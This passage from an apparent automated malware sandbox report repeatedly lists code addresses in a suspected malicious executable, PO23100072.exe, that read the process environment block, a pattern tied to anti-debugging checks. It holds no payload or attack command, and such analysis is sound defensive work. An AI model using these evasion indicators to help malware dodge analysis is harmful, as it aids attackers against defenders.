            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018547A0 mov eax, dword ptr fs:[00000030h]5_2_018547A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A0750 mov eax, dword ptr fs:[00000030h]5_2_017A0750
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2750 mov eax, dword ptr fs:[00000030h]5_2_017E2750
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2750 mov eax, dword ptr fs:[00000030h]5_2_017E2750
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D674D mov esi, dword ptr fs:[00000030h]5_2_017D674D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D674D mov eax, dword ptr fs:[00000030h]5_2_017D674D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D674D mov eax, dword ptr fs:[00000030h]5_2_017D674D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D273C mov eax, dword ptr fs:[00000030h]5_2_017D273C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D273C mov ecx, dword ptr fs:[00000030h]5_2_017D273C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D273C mov eax, dword ptr fs:[00000030h]5_2_017D273C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018207C3 mov eax, dword ptr fs:[00000030h]5_2_018207C3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC720 mov eax, dword ptr fs:[00000030h]5_2_017DC720
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC720 mov eax, dword ptr fs:[00000030h]5_2_017DC720
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182E7E1 mov eax, dword ptr fs:[00000030h]5_2_0182E7E1
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A0710 mov eax, dword ptr fs:[00000030h]5_2_017A0710
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D0710 mov eax, dword ptr fs:[00000030h]5_2_017D0710
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC700 mov eax, dword ptr fs:[00000030h]5_2_017DC700
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A47FB mov eax, dword ptr fs:[00000030h]5_2_017A47FB
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A47FB mov eax, dword ptr fs:[00000030h]5_2_017A47FB
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C27ED mov eax, dword ptr fs:[00000030h]5_2_017C27ED
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C27ED mov eax, dword ptr fs:[00000030h]5_2_017C27ED
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C27ED mov eax, dword ptr fs:[00000030h]5_2_017C27ED
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181C730 mov eax, dword ptr fs:[00000030h]5_2_0181C730
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AC7C0 mov eax, dword ptr fs:[00000030h]5_2_017AC7C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A07AF mov eax, dword ptr fs:[00000030h]5_2_017A07AF
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01824755 mov eax, dword ptr fs:[00000030h]5_2_01824755
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182E75D mov eax, dword ptr fs:[00000030h]5_2_0182E75D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D2674 mov eax, dword ptr fs:[00000030h]5_2_017D2674
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA660 mov eax, dword ptr fs:[00000030h]5_2_017DA660
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA660 mov eax, dword ptr fs:[00000030h]5_2_017DA660
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BC640 mov eax, dword ptr fs:[00000030h]5_2_017BC640
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A262C mov eax, dword ptr fs:[00000030h]5_2_017A262C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BE627 mov eax, dword ptr fs:[00000030h]5_2_017BE627
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D6620 mov eax, dword ptr fs:[00000030h]5_2_017D6620
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D8620 mov eax, dword ptr fs:[00000030h]5_2_017D8620
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2619 mov eax, dword ptr fs:[00000030h]5_2_017E2619
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018206F1 mov eax, dword ptr fs:[00000030h]5_2_018206F1
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018206F1 mov eax, dword ptr fs:[00000030h]5_2_018206F1
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E609 mov eax, dword ptr fs:[00000030h]5_2_0181E609
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA6C7 mov ebx, dword ptr fs:[00000030h]5_2_017DA6C7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA6C7 mov eax, dword ptr fs:[00000030h]5_2_017DA6C7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D66B0 mov eax, dword ptr fs:[00000030h]5_2_017D66B0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC6A6 mov eax, dword ptr fs:[00000030h]5_2_017DC6A6
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186866E mov eax, dword ptr fs:[00000030h]5_2_0186866E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186866E mov eax, dword ptr fs:[00000030h]5_2_0186866E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A4690 mov eax, dword ptr fs:[00000030h]5_2_017A4690
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A4690 mov eax, dword ptr fs:[00000030h]5_2_017A4690
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E096E mov eax, dword ptr fs:[00000030h]5_2_017E096E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E096E mov edx, dword ptr fs:[00000030h]5_2_017E096E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E096E mov eax, dword ptr fs:[00000030h]5_2_017E096E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C6962 mov eax, dword ptr fs:[00000030h]5_2_017C6962
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C6962 mov eax, dword ptr fs:[00000030h]5_2_017C6962
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C6962 mov eax, dword ptr fs:[00000030h]5_2_017C6962
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018289B3 mov esi, dword ptr fs:[00000030h]5_2_018289B3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018289B3 mov eax, dword ptr fs:[00000030h]5_2_018289B3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018289B3 mov eax, dword ptr fs:[00000030h]5_2_018289B3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018369C0 mov eax, dword ptr fs:[00000030h]5_2_018369C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186A9D3 mov eax, dword ptr fs:[00000030h]5_2_0186A9D3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01798918 mov eax, dword ptr fs:[00000030h]5_2_01798918
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01798918 mov eax, dword ptr fs:[00000030h]5_2_01798918
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182E9E0 mov eax, dword ptr fs:[00000030h]5_2_0182E9E0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D29F9 mov eax, dword ptr fs:[00000030h]5_2_017D29F9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D29F9 mov eax, dword ptr fs:[00000030h]5_2_017D29F9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E908 mov eax, dword ptr fs:[00000030h]5_2_0181E908
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E908 mov eax, dword ptr fs:[00000030h]5_2_0181E908
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182C912 mov eax, dword ptr fs:[00000030h]5_2_0182C912
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182892A mov eax, dword ptr fs:[00000030h]5_2_0182892A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0183892B mov eax, dword ptr fs:[00000030h]5_2_0183892B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D49D0 mov eax, dword ptr fs:[00000030h]5_2_017D49D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01820946 mov eax, dword ptr fs:[00000030h]5_2_01820946
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A09AD mov eax, dword ptr fs:[00000030h]5_2_017A09AD
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A09AD mov eax, dword ptr fs:[00000030h]5_2_017A09AD
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01844978 mov eax, dword ptr fs:[00000030h]5_2_01844978
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01844978 mov eax, dword ptr fs:[00000030h]5_2_01844978
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182C97C mov eax, dword ptr fs:[00000030h]5_2_0182C97C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182C89D mov eax, dword ptr fs:[00000030h]5_2_0182C89D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A4859 mov eax, dword ptr fs:[00000030h]5_2_017A4859
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A4859 mov eax, dword ptr fs:[00000030h]5_2_017A4859
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D0854 mov eax, dword ptr fs:[00000030h]5_2_017D0854
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B2840 mov ecx, dword ptr fs:[00000030h]5_2_017B2840
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C2835 mov ecx, dword ptr fs:[00000030h]5_2_017C2835
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA830 mov eax, dword ptr fs:[00000030h]5_2_017DA830
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186A8E4 mov eax, dword ptr fs:[00000030h]5_2_0186A8E4
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC8F9 mov eax, dword ptr fs:[00000030h]5_2_017DC8F9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC8F9 mov eax, dword ptr fs:[00000030h]5_2_017DC8F9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182C810 mov eax, dword ptr fs:[00000030h]5_2_0182C810
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE8C0 mov eax, dword ptr fs:[00000030h]5_2_017CE8C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184483A mov eax, dword ptr fs:[00000030h]5_2_0184483A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184483A mov eax, dword ptr fs:[00000030h]5_2_0184483A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182E872 mov eax, dword ptr fs:[00000030h]5_2_0182E872
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182E872 mov eax, dword ptr fs:[00000030h]5_2_0182E872
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01836870 mov eax, dword ptr fs:[00000030h]5_2_01836870
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01836870 mov eax, dword ptr fs:[00000030h]5_2_01836870
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A0887 mov eax, dword ptr fs:[00000030h]5_2_017A0887
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179CB7E mov eax, dword ptr fs:[00000030h]5_2_0179CB7E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01854BB0 mov eax, dword ptr fs:[00000030h]5_2_01854BB0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01854BB0 mov eax, dword ptr fs:[00000030h]5_2_01854BB0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184EBD0 mov eax, dword ptr fs:[00000030h]5_2_0184EBD0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CEB20 mov eax, dword ptr fs:[00000030h]5_2_017CEB20
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CEB20 mov eax, dword ptr fs:[00000030h]5_2_017CEB20
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182CBF0 mov eax, dword ptr fs:[00000030h]5_2_0182CBF0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CEBFC mov eax, dword ptr fs:[00000030h]5_2_017CEBFC
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A8BF0 mov eax, dword ptr fs:[00000030h]5_2_017A8BF0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A8BF0 mov eax, dword ptr fs:[00000030h]5_2_017A8BF0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A8BF0 mov eax, dword ptr fs:[00000030h]5_2_017A8BF0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01868B28 mov eax, dword ptr fs:[00000030h]5_2_01868B28
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01868B28 mov eax, dword ptr fs:[00000030h]5_2_01868B28
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A0BCD mov eax, dword ptr fs:[00000030h]5_2_017A0BCD
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A0BCD mov eax, dword ptr fs:[00000030h]5_2_017A0BCD
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A0BCD mov eax, dword ptr fs:[00000030h]5_2_017A0BCD
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C0BCB mov eax, dword ptr fs:[00000030h]5_2_017C0BCB
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C0BCB mov eax, dword ptr fs:[00000030h]5_2_017C0BCB
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C0BCB mov eax, dword ptr fs:[00000030h]5_2_017C0BCB
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01836B40 mov eax, dword ptr fs:[00000030h]5_2_01836B40
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01836B40 mov eax, dword ptr fs:[00000030h]5_2_01836B40
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0BBE mov eax, dword ptr fs:[00000030h]5_2_017B0BBE
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0BBE mov eax, dword ptr fs:[00000030h]5_2_017B0BBE
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186AB40 mov eax, dword ptr fs:[00000030h]5_2_0186AB40
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01848B42 mov eax, dword ptr fs:[00000030h]5_2_01848B42
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01854B4B mov eax, dword ptr fs:[00000030h]5_2_01854B4B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01854B4B mov eax, dword ptr fs:[00000030h]5_2_01854B4B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184EB50 mov eax, dword ptr fs:[00000030h]5_2_0184EB50
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874A80 mov eax, dword ptr fs:[00000030h]5_2_01874A80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DCA6F mov eax, dword ptr fs:[00000030h]5_2_017DCA6F
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DCA6F mov eax, dword ptr fs:[00000030h]5_2_017DCA6F
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DCA6F mov eax, dword ptr fs:[00000030h]5_2_017DCA6F
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0A5B mov eax, dword ptr fs:[00000030h]5_2_017B0A5B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0A5B mov eax, dword ptr fs:[00000030h]5_2_017B0A5B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A6A50 mov eax, dword ptr fs:[00000030h]5_2_017A6A50
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A6A50 mov eax, dword ptr fs:[00000030h]5_2_017A6A50
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A6A50 mov eax, dword ptr fs:[00000030h]5_2_017A6A50
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A6A50 mov eax, dword ptr fs:[00000030h]5_2_017A6A50
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A6A50 mov eax, dword ptr fs:[00000030h]5_2_017A6A50
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A6A50 mov eax, dword ptr fs:[00000030h]5_2_017A6A50
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A6A50 mov eax, dword ptr fs:[00000030h]5_2_017A6A50
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DCA38 mov eax, dword ptr fs:[00000030h]5_2_017DCA38
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C4A35 mov eax, dword ptr fs:[00000030h]5_2_017C4A35
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C4A35 mov eax, dword ptr fs:[00000030h]5_2_017C4A35
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CEA2E mov eax, dword ptr fs:[00000030h]5_2_017CEA2E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DCA24 mov eax, dword ptr fs:[00000030h]5_2_017DCA24
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182CA11 mov eax, dword ptr fs:[00000030h]5_2_0182CA11
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DAAEE mov eax, dword ptr fs:[00000030h]5_2_017DAAEE
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DAAEE mov eax, dword ptr fs:[00000030h]5_2_017DAAEE
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A0AD0 mov eax, dword ptr fs:[00000030h]5_2_017A0AD0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D4AD0 mov eax, dword ptr fs:[00000030h]5_2_017D4AD0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D4AD0 mov eax, dword ptr fs:[00000030h]5_2_017D4AD0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017F6ACC mov eax, dword ptr fs:[00000030h]5_2_017F6ACC
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017F6ACC mov eax, dword ptr fs:[00000030h]5_2_017F6ACC
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017F6ACC mov eax, dword ptr fs:[00000030h]5_2_017F6ACC
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A8AA0 mov eax, dword ptr fs:[00000030h]5_2_017A8AA0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A8AA0 mov eax, dword ptr fs:[00000030h]5_2_017A8AA0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017F6AA4 mov eax, dword ptr fs:[00000030h]5_2_017F6AA4
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184EA60 mov eax, dword ptr fs:[00000030h]5_2_0184EA60
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D8A90 mov edx, dword ptr fs:[00000030h]5_2_017D8A90
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181CA72 mov eax, dword ptr fs:[00000030h]5_2_0181CA72
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181CA72 mov eax, dword ptr fs:[00000030h]5_2_0181CA72
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AEA80 mov eax, dword ptr fs:[00000030h]5_2_017AEA80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A8D59 mov eax, dword ptr fs:[00000030h]5_2_017A8D59
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A8D59 mov eax, dword ptr fs:[00000030h]5_2_017A8D59
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A8D59 mov eax, dword ptr fs:[00000030h]5_2_017A8D59
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A8D59 mov eax, dword ptr fs:[00000030h]5_2_017A8D59
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A8D59 mov eax, dword ptr fs:[00000030h]5_2_017A8D59
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A0D59 mov eax, dword ptr fs:[00000030h]5_2_017A0D59
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A0D59 mov eax, dword ptr fs:[00000030h]5_2_017A0D59
